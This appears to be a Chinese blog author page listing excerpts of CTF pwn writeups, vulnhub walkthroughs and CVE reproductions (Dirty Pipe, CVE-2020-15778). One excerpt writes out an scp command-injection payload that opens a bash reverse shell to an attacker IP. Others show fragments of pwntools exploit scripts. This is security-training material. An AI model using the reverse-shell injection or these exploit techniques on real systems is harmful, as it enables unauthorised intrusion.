自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(113)
  • 资源 (2)
  • 收藏
  • 关注

原创 第一届古剑山ctf-pwn全部题解

首先可以通过unsorted bin attack将unsorted bin(av)写入到堆数组中,等会就可以随意修改unsorted bin的fd和bk指针了,从而达到往unsorted bin中链入fake chunk的目的。所以chunk地址伪造成0x6020e8,它的bk正好是heap[0]满足要求,最后申请到bss段上的chunk,就可以修改某一个数组的值为free_got值,然后修改其为puts函数,泄露libc,最后再改成system即可。为了图省事,就直接打sub_804857B的溢出了。

2023-12-13 14:39:40 981 1

原创 2023SICTF ROUND2 baby_heap

就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。

2023-09-12 22:21:27 340 1

原创 安洵杯2023 部分pwn复现

漏洞点:覆盖printf的返回地址。

2023-06-26 12:03:35 476

原创 vulnhub靶机-Corrosion:2

1、找到靶机ip:192.168.1.106nmap -sn 192.168.1.0/242、扫描靶机端口,开放22、80和8080端口

2022-05-03 11:50:33 596

原创 vn_2020_simpleheap

1、保护全开,64位程序2、主函数包括增删改和打印功能

2022-05-02 20:51:37 370

原创 2022DASCTF Apr X FATE 防疫挑战赛 good_luck

这道题最开始的附件,代码是随机生成一个0~199的数,然后0触发格式化字符串漏洞,1触发栈溢出漏洞,修改后的附件随机数是0或者1下面是脚本,脚本逻辑:通过栈溢出返回到格式化字符串漏洞函数,泄露libc地址,然后再返回到main函数,通过栈溢出执行onegadget几率:第一次执行栈溢出1/2,第二次再次执行栈溢出1/2,1/4的概率执行成功from pwn import *from LibcSearcher import *context(log_level = "debug")csu

2022-04-24 19:03:17 776

原创 两道pwn题中的小trick

1、get_started_3dsctf_2016比较常规的解法:  由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。参考:buuoj get_started_3dsctf_2016 WriteUp - CSULuyao - 博客园from pwn import *import sy

2022-04-19 18:39:07 231

原创 ciscn_2019_c_1

坑点:ida反编译地址不对解决办法:通过ROPdadget工具获得正确的pop_rdi和ret的地址问题:libc版本寻找解决:通过LibcSearcher工具进行寻找难点(写这篇文章的目的):这个问题和我前两篇checkin脚本分析最后自己写的一个脚本出现同样的情况,因为题目环境是Ubuntu18,所以需要栈对齐-----地址末尾为0,所以需要加ret不加ret之前的rsp地址加了ret后最后的脚本,python3环境,上述libcsearcher工具要求..

2022-04-14 11:31:28 2908

原创 ret2csu和ret2dlresolve x86&x64

ret2csu函数csu_front_addr = 0x400790 # mov rdx, r14csu_end_addr = 0x4007AA # add rsp, 8#根据glibc的版本不同参数的位置也要进行相应的调整def csu(rbx, rbp, r12, r15, r14, r13): # pop rbx, rbp, r12, r13, r14, r15 # rbx = 0 # rbp = 1, enable not to

2022-04-11 23:14:38 457

原创 2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析

只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做第一种:利用magic_gadget修改got表中setvbuf的值在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的出处:2022DASCTFXSU三月春季挑战赛-p

2022-04-03 15:39:18 4536 9

原创 vulnhub靶机-THALES: 1

1、找到靶机ip:192.168.1.106nmap -sn 192.168.1.0/242、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...

2022-03-18 23:24:36 4493 3

原创 CVE-2022-0847漏洞复现

The Dirty Pipe Vulnerability漏洞摘要 Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞,该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。 它允许覆盖任意只读文件中的数据,非特权用户通过替换/etc/passwd文件中roo

2022-03-09 20:52:48 5294

原创 vulnhub靶机-JANGOW: 1.0.1

DescriptionBack to the TopDifficulty: easyThe secret to this box is enumeration! Inquiries [email protected] works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.01、开机(virtualbox)直接得到靶机ip:192.16.

2022-03-08 13:34:39 4216 1

原创 vulnhub靶机-Raven: 2

1、找到靶机ip:192.168.134.130nmap -sn 192.168.134.0/242、扫描靶机端口,开放22、80、111和33222端口┌──(root????cracer)-[~]└─# nmap -p- -A 192.168.134.130Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for raven.local (192.168.134.130)Host is up (0.00055s l

2021-11-15 11:54:33 3706

原创 vulnhub靶机-DEATHNOTE: 1

1、找到靶机ip:192.168.43.11nmap -sn 192.168.43.0/242、扫描靶机端口,只开放22和80端口┌──(root????cracer)-[~]└─# nmap -p- -A 192.168.43.11 Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for deathnote (192.168.43.11)Host is up (0.0012s latency).Not shown

2021-10-24 22:58:18 5953

原创 vulnhub靶机-DIGITALWORLD.LOCAL: SNAKEOIL

1、找到靶机ip:192.168.162.132nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????kali)-[~]└─# nmap -A -p- 192.168.116.132Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for 192.168.116.132Host is up (0.00033s latency).Not shown: 65533 c

2021-09-10 14:09:34 1669 4

原创 vulnhub靶机-DarkHole: 1

靶机描述:Difficulty: EasyIt's a box for beginners, but not easy, Good LuckHint: Don't waste your time For Brute-Force1、找到靶机ip:192.168.162.132nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????kali)-[~]└─# nmap -A -p- 192.168.116.132

2021-08-25 01:00:58 956

原创 vulnhub靶机-Corrosion

1、找到靶机ip:192.168.162.131nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????cracer)-[~]└─# nmap -A -p- 192.168.162.131Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for 192.168.162.131Host is up (0.00067s latency).

2021-08-16 03:29:42 609

原创 vulnhub靶机-Netstart: 1

1、找到靶机ip:192.168.75.21nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -A -p- 192.168.75.21Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.21Host is up (0.00047s latency).Not shown: 65534 closed portsPORT STATE

2021-02-10 22:06:33 491

原创 vulnhub靶机-School: 1

1、找到靶机ip:192.168.75.18nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.18Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.18Host is up (0.00042s latency).Not shown: 65532 closed portsPORT STATE

2021-02-06 14:35:36 1959

原创 vulnhub靶机-ODIN: 1

靶机描述:1、找到靶机ip:192.168.75.14nmap -sn 192.168.75.142、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.14Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for odin (192.168.75.14)Host is up (0.00047s latency).Not shown: 65534 closed ports

2021-01-06 19:52:15 1192 3

原创 vulnhub靶机-JETTY: 1

靶机描述:1、找到靶机ip:192.168.75.12nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.12Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 16:00 CSTNmap scan report for 192.168.75.12Host is up (0.00044s latency).Not shown:

2021-01-04 17:07:37 1351

原创 vulnhub靶机-CHILL HACK: 1

靶机描述:提示枚举1、找到靶机ip:192.168.74.135nmap -sn 192.168.74.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.74.135Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.74.135Host is up (0.0044s latency).Not shown: 65532 closed portsPO

2020-12-21 16:41:47 975

原创 vulnhub靶机-Y0USEF: 1

1、找到靶机ip:192.168.75.11nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.11Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.11Host is up (0.00038s latency).Not shown: 65533 closed portsPORT STATE

2020-12-17 20:17:50 1246

原创 FUNBOX-5: NEXT LEVEL

1、找到靶机ip:192.168.75.10nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.10Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.10Host is up (0.00044s latency).Not shown: 65533 filtered portsPORT STAT

2020-12-02 16:48:49 661 1

原创 FunBox-4: CTF

1、使用下面的命令找到靶机ip:192.168.75.9nmap -sn 192.168.75.0/242、扫描靶机端口3、看到有80端口,访问是一个默认的apache页面,扫描目录也扫不出东西,但是在这个靶机下载的页面作者是给了提示的,注意大小写,换了大写之后,发现有一个ROBOTS.TXT文件,访问发现有upload目录但是直接访问又显示没有,但是在那个ROBOTS.TXT页面下右边有个滚动条,这是藏信息的惯用操作了,发现另一个目录访问显示403,想到拼上刚刚的

2020-11-30 16:43:02 620

原创 vulnhub靶机-Mrr3b0t

程序员节,写篇文章意思意思,这个靶机比较考脑洞,前面还有一个隐写的技巧(用到的网站挺好的),适合打ctf的人做由于ip获取不对,所1、找到靶机ip:192.168.43.201nmap -sn 192.168.43.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.43.201Starting Nmap 7.80 ( https://nmap.org )Stats: 0:00:52 elapsed; 0 hosts completed

2020-10-24 11:49:33 666

原创 vulnhub靶机-FIRSTBLOOD: 1

绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了1、找到靶机ip:192.168.74.130nmap -sn 192.168.74.0/242、扫描靶机端口,得到80端口和60022端口(ssh服务)root@kali:~# nmap -A -p- 192.168.74.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130Host is up (0.000

2020-09-25 16:26:53 1669

原创 vulnhub靶机-So Simple: 1

1、靶机开机即得ip地址:192.168.8.1092、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.109Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for so-simple (192.168.8.109)Host is up (0.00056s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION

2020-08-10 20:37:11 1094 1

原创 vulnhub靶机-Photographer: 1

1、找到靶机ip:192.168.8.168nmap -sn 192.168.8.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.168Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for photographer (192.168.8.168)Host is up (0.00051s latency).Not shown: 65531 closed portsPOR

2020-08-09 21:54:30 2212

原创 CVE-2020-15778漏洞复现

产品:Openssh影响的组件:SCP漏洞版本:<= openssh-8.3p1scp命令引发的命令注入反弹shell的payloadscp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'实战测试,这里使用本机进行测试1、查看ssh版本,符合漏洞版本ssh -V2、先在本地新建好文件,用于上传2、本地开启监听3、使用s.

2020-08-04 20:17:49 11737 5

原创 vulnhub靶机-CyberSploit: 2

1、找到靶机ip:192.168.0.131nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.130Host is up (0.00070s latency).Not shown: 65533 closed portsPORT STATE SERV

2020-07-20 22:14:29 763 2

原创 vulnhub靶机-CyberSploit: 1

这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单1、找到靶机ip:192.168.0.130nmap -sn 192.168.0.0/242、扫描靶机端口3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..

2020-07-20 21:34:37 1355

原创 vulnhub靶机-sunset:decoy

1、找到靶机ip:192.168.0.129nmap -sn 192.168.0.0/242、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态root@kali:~# nmap -p- -A 192.168.0.129Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.129Host is up (0.0057s latency).Not shown: 65528 closed p

2020-07-20 16:22:45 1418

原创 vulnhub靶机-sunset:sunrise

1、找到靶机ip:192.168.0.128nma -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.128Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.128Host is up (0.00044s latency).Not shown: 65531 closed portsPORT STATE SERVIC

2020-07-19 18:21:47 1097

原创 vulnhub靶机-sunset:dusk

1、获取靶机ip:192.168.0.127nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.127Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.127Host is up (0.00097s latency).Not shown: 65529 closed portsPORT STATE SER

2020-07-18 18:56:47 1005

原创 vulnhub靶机-sunset:nightfall

1、找到靶机ip:192.168.0.125nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.125Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.125Host is up (0.0018s latency).Not shown: 65529 closed portsPORT STATE SERV

2020-07-17 22:31:18 742

原创 vulnhub靶机-sunset:dawn

1、找到靶机ip:192.168.0.123nmap 192.168.0.0/24 2、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.123Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.123Host is up (0.0090s latency).Not shown: 65531 closed portsPORT STATE SERV

2020-07-16 20:45:33 1036

原创 vulnhub靶机-sunset:1

这个靶机比较容易,水一篇,后面接着写这个sunset系列1、找到靶机ip:192.168.0.122nmap -sn 192.168.0.0/242、扫描靶机端口oot@kali:~# nmap -sn 192.168.0.0/24Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.1Host is up (0.0016s latency).MAC Address: 8C:21:0A:BC

2020-07-15 17:57:14 1305

原创 vulnhub靶机-Pwned

有这么久没写了,这次就写一下目前vulnhub最新出的靶机Pwned,目的是拿到3个flag,难度是easy,但是较我以往的博客多了一种提权方式1、寻找靶机地址:192.168.0.118nmap -sn 192.168.0.0/242、扫描靶机开放端口root@kali:~# nmap -p- -A 192.168.0.118Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.118.

2020-07-14 17:08:25 1864 2

升级到一个智能的shell.txt

升级到一个智能的shell.txt

2021-08-16

2个chrome 0day poc

2个chrome 0day poc

2021-04-20

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除